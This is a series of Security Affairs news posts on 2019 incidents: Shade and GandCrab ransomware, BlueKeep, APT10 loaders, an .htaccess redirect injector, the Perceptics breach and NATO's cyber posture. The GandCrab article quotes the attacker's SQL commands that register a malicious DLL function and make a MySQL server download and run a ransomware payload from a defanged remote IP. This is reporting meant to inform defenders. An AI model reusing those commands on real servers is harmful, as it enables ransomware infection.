Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats in the cyber crime scenario, it has been active at least since 2014 when a massive infection was observed in Russian. The Shade infections increased during October 2018, keeping a constant trend until the second half of December 2018, taking a break around Christmas, and then resuming in mid-January 2019 doubled in size.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,” 

Moth of the victims belongs to high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits, experts pointed out that its executable (EXE) remains “remarkably consistent” since its discovery in 2014.

Once a Windows system gets infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops on the Desktop 10 text files, named README1.txt through README10.txt,

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.

Shade Ransomware 2

The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.

The researchers noticed that all the Malspam campaigns spreading the Shade ransomware were retrieving an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian language countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)

The post Shade Ransomware is very active outside of Russia and targets more English-speaking victims appeared first on Security Affairs.

Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw

Several products made by Siemens Healthineers are affected by a recently patched Windows BlueKeep vulnerability (CVE-2019-0708).

The BlueKeep issue is a remote code execution vulnerability in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be triggered by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

After the release of security updates for the BlueKeep, Siemens started assessing its Healthineers products. Now Siemens has published six security advisories to warn its customers of potential risks,

“Some Siemens Healthineers software products are affected by this vulnerability.” reads an advisory published by Siemens. “The exploitability of the vulnerability depends on the specific configuration and deployment environment of each product. Siemens Healthineers recommends installing the appropriate security patches released by Microsoft.”

The company pointed out that it cannot guarantee the compatibility of Microsoft security patches with products from Siemens Healthineers that are beyond their End of Support.

siemens healthineers bluekeep

Impacted products include MagicLinkA, MagicView, Medicalis solutions, Screening Navigator, syngo solutions and teamplay (receiver software only).

For most of the products, the advisories suggest disabling RDP, blocking TCP port 3389, and implementing workarounds suggested by Microsoft.

Siements also recommends to ensure to have appropriate backups and system restoration procedures, and suggest to contact local Siemens Healthineers customer service engineer, portal or our Regional Support Center for remediation guidance information.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Healthineers, BlueKeep)

The post Siemens Healthineers medical products vulnerable to Windows BlueKeep flaw appeared first on Security Affairs.

APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, China-linked cyber-espionage group tracked as APT10 has added two new loaders to its arsenal and used it against government and private organizations in Southeast Asia.

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector

The recent attacks were uncovered by experts at enSilo, they also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

  • jjs.exe – legitimate executable, a JVM-based implementation of a javascript engine as part of the Java platform that acted as a loader for the malware.
  • jli.dll – malicious DLL
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – binary file

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).

APT10 chinese hackers

The loaders implement DLL Side-Loading, this means it starts by running a legitimate executable which is abused to load a malicious DLL.

Both loaders use the jli.dll library that maps a data file, svchost.bin, to memory and decrypts it to retrieve a shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in the way they ensure persistence, the first uses a service as its persistence method, while the second variant leverages the Run registry key for the current user under the name “Windows Updata” . 

“It goes a long way to completely remove any sign of McAfee’s email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed by in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used by the attackers in the last campaigns are still on a development phase.

“Both variants of the loader implement the same decryption and injection mechanism.” concludes the experts.

Further technical details, including IoCs, are reported in the analysis published by inSile.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – APT10, hacking)

The post APT10 is back with two new loaders and new versions of known payloads appeared first on Security Affairs.

BlueKeep scans observed from exclusively Tor exit nodes

GreyNoise experts detected scans for systems vulnerable to the BlueKeep (CVE-2019-0708) vulnerability from exclusively Tor exit nodes.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including an RDS vulnerability dubbed BlueKeep that can be exploited to carry out WannaCry-like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with wormable capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

Several security experts have already developed their own exploit code for this issue without publicly disclosing it for obvious reasons.

Experts at the SANS Institute observed two partial exploits that are publicly available. Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges. Researchers at McAfee developed a PoC exploit that could be exploited to get remote code execution.

Other experts also announced to have successfully developed exploits for BlueKeep, including KasperskyCheck Point, and MalwareTech.

Experts at NCC Group released detection rules for the detection of exploitation attempts for this issue. A similar

News of the day is that an attacker started scanning for Windows systems vulnerable to BlueKeep (CVE-2019-0708) vulnerability, fortunately without attempting to exploit it.

The scans were first detected on May 25, 2019, by experts at GreyNoise, a single threat actor launched them from the Tor network to hide their identities.

Experts believe that it’s a matter of time until security firms will detect exploit attempts in the wild.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacking, Windows BlueKeep)

The post BlueKeep scans observed from exclusively Tor exit nodes appeared first on Security Affairs.

Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects

Security researchers are monitoring a new hacking campaign aimed at Joomla and WordPress websites, attackers used .htaccess injector for malicious redirect.

Researchers at Sucuri are warning Joomla and WordPress websites admins of malicious hypertext access (.htaccess) injector found on a client website. The website was used by attackers to redirect traffic to advertising sites that attempted to deliver malware.

“During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website. ” reads the report.

.htaccess files are configuration files for web servers running the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features. The features include the redirect functionality, content password protection or image hot link prevention.

Sucuri spotted threat actors abusing the URL redirect function of the .htaccess file to redirect visitors of compromised websites to phishing sites, sites delivering malware, or simply to generate impressions.

At the time is not clear how attackers gain access to the Joomla and WordPress websites, we only know that they inject the malicious code onto some of the website’s index.php files.

“Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

htaccess redirect

“This code is searching for an .htaccess file. If found, this code will place malicious redirects in the file immediately after “# BEGIN WORDPRESS”.” continues the report.

A warning message from endpoint antivirus software when users try to visit malicious site redirected by Joomla and WordPress sites.

This .php code also searches for more files and folders, trying to search nested folders.

It’s not uncommon to see hackers targeting websites through .htacccess file, including, in October 2018 a security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, in older versions of the jQuery File Upload plugin since 2010. Attackers exploited the issue to carry out several malicious activities, including defacement, exfiltration, and malware infection.

alled jQuery File Upload placed 7,800 different software applications at potential risk for compromise and remote code-execution.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a director) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

“While the majority of web applications make use of redirects, these features are also commonly used by bad actors to generate advertising impressions, send unsuspecting site visitors to phishing sites, or other malicious web pages.” concludes Sucuri.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – .htaccess, hacking)

The post Crooks leverages .htaccess injector on Joomla and WordPress sites for malicious redirects appeared first on Security Affairs.

Hacker breached Perceptics, a US maker of license plate readers

Perceptics, a maker of vehicle license plate scanning solutions used in the US, has been hacked, attackers stole data and offered for free on the dark web.

Perceptics is a leader in license plate readers (LPRs), license plate recognition systems and vehicle identification products. The company was hacked and attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.

LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle traffic (POV) in the United States, Canada, and for the most critical lanes in Mexico.

Last week, a hacker that goes online with the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and showing it a list of files as proof of the attack.

perceptics hack files 2

The hacker stole hundreds of gigabytes of files along with Microsoft Exchange and Access databases, ERP databases, HR records, and Microsoft SQL Server data stores.

The name ‘Boris’ is not new for the cyber security industry, it is the name of the hacker who breached the IT provider CityComp at the end of April.

Stolen data include some databases and company documents.

“The file names and accompanying directories – numbering almost 65,000 – fit with the focus of the surveillance technology biz.” reads the post published by El Reg. “They include .xlsx files named for locations and zip codes, .jpg files with names that refer to “driver” and “scene,” .docx files associated with presumed government clients like ICE, and date-and-time stamped .jpgs and .mp4 files.”

Perceptics confirmed the incident and reported it to the authorities, the company did not provide technical details about the hack.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Perceptics, data breach)

The post Hacker breached Perceptics, a US maker of license plate readers appeared first on Security Affairs.

Security Affairs newsletter Round 215 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

https://www.surveymonkey.com/r/EUBloggerAwards2018

Dutch intelligence investigate alleged Huawei ‘backdoor
Salesforce faced one of its biggest service disruption of ever
Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk
Amnesty International filed a lawsuit against Israeli surveillance firm NSO
Chronicle experts spotted a Linux variant of the Winnti backdoor
Data belonging to Instagram influencers and celebrities exposed online
Defiant Tech firm who operated LeakedSource pleads guilty
Google will block Huawei from using Android and its services
Linux kernel privilege escalation flaw CVE-2019-11815 affects RDS
After latest Microsoft Windows updates some PCs running Sophos AV not boot
Emsisoft released a free Decrypter for JSWorm 2.0
Group-IB blocked more than 180,000 links to pirated copies of Game of Thrones
MuddyWater BlackWater campaign used new anti-detection techniques
US Commerce Department delays Huawei ban for 90 Days
ActiveX Controls in South Korean websites are affected by critical flaws
Emsisoft released a free Decrypter for the GetCrypt ransomware
G Suite users passwords stored in plain-text for more than 14 years
SandboxEscaper is back with a new Windows Zero-Day in Task Scheduler
The Satan Ransomware adds new exploits to its arsenal
Anonymous and LulzSec target the Italian Police and doctors
Playing Cat and Mouse: Three Techniques Abused to Avoid Detection
PoC Exploits for CVE-2019-0708 wormable Windows flaw released online
SandboxEscaper disclosed 3 Microsoft zero-day flaws in 24 hours
Tor Browser for Android is available through the Play Store
UK provided evidence to 16 NATO allies of Russia hacking campaigns
Chronicles study reveals CAs that issued most certificates to sign malware samples on VirusTotal
Facebook says it took down 2.19 billion accounts in Q1 2019
How Hackers Access Direct Deposit Paycheck — And What to Do About It
US DoJs superseding indictment charges Assange with violating Espionage Act
0patch issued a micropatch to address the BlueKeep flaw in always-on servers
GitHub introduces new tools and security features to secure code
Hackers target MySQL databases to deliver the GandCrab ransomware
Snapchat staff used internal tools to spy on users

Pierluigi Paganini

(SecurityAffairs – newsletter)



The post Security Affairs newsletter Round 215 – News of the week appeared first on Security Affairs.

Remarks on NATO and its approach to the cyber offensive

This week NATO Secretary General Jens Stoltenberg explained during a conference at the Cyber Defence Pledge conference in London how the Alliance is countering cyber threats.

This week during the Cyber Defence Pledge conference in London, NATO Secretary General Jens Stoltenberg explained how the Alliance is countering cyber threats.

Stoltenberg declared that NATO is pushing limits of what the alliance can do in cyberspace adopting a more aggressive approach on cyber offensive.

The Secretary General confirmed that the alliance will not limit its operation to defense in case of a cyber attack.

“We are not limited to respond in cyberspace when we are attacked in cyberspace.” said Stoltenberg,

“NATO allies have already “agreed to integrate national cyber capabilities or offensive cyber into Alliance operations and missions.”

NATO alliance

The Secretary General explained that cyber-attacks can be as damaging as conventional attacks. A cyber attack can cause billions of dollars’ worth of damage to our economies, paralyse critical infrastructure, undermine democracies.

Unfortunately, cyber attacks are becoming more frequent, more complex and more destructive.

“NATO is not immune. We register suspicious events against NATO cyber systems every day. And cyber threats will become more dangerous with the development of new technologies. Such as artificial intelligence, machine learning and deep fakes.” said Stoltenberg.

“These technologies are fundamentally changing the nature of warfare. As much as the industrial revolution did. NATO is adapting to this new reality.”

Since 2016 NATO members agreed that a cyber attack against one of them could trigger a military response under Article 5.

Anyway we have to remark that the conditions for a NATO response to cyber attacks remains formally undefined.

NATO is born as a defensive alliance, meanwhile, now it is changing its posture on a more aggressive approach. A response under Article 5, could be prepared in many different ways and in different warfare domains.

“And at our Summit in Brussels last year, we agreed to establish a Cyberspace Operations Centre. At the heart of our military command structure.” continues the Secretary General. “And we have agreed to integrate national cyber capabilities or offensive cyber into Alliance operations and missions. All of this has made NATO more effective in cyberspace.”

The Alliance is currently building a cyber command that will be fully operational in 2023, the command will coordinate and conduct all offensive cyber operations of the alliance. Until then, likely NATO will rely on its Allies for offensive operations, the thought is for the US Cyber Command.

Let me suggest reading remarks by NATO Secretary General Jens Stoltenberg at the Cyber Defence Pledge Conference, London, it is avery interesting discussion that includes responses to the attendees.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – North Atlantic Treaty Organization, cyber offensive)

The post Remarks on NATO and its approach to the cyber offensive appeared first on Security Affairs.

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware

Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases, threat actors aim at delivering the GandCrab ransomware.

This is the first time the company sees hackers targeting Windows servers running instances MySQL databases to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots that emulates MySQL listening on the default TCP port 3306.

The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the “set” command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server’s plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe') 

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.

According to Sophos, at least one Chinese threat actor is currently carrying out such kind of attacks, scanning the internet for Windows servers that are running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that targeted the honeypot was downloaded more than 500 times. Unfortunately, the sample was not the only one, counted together, experts estimated that there have been nearly 800 downloads in the five days, as well as more than 2300 downloads of the other GandCrab sample in the open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there has been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.

The researchers pointed out that this isn’t a massive or widespread attack, anyway it represents a serious risk to MySQL server admins that exposed their installs online.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.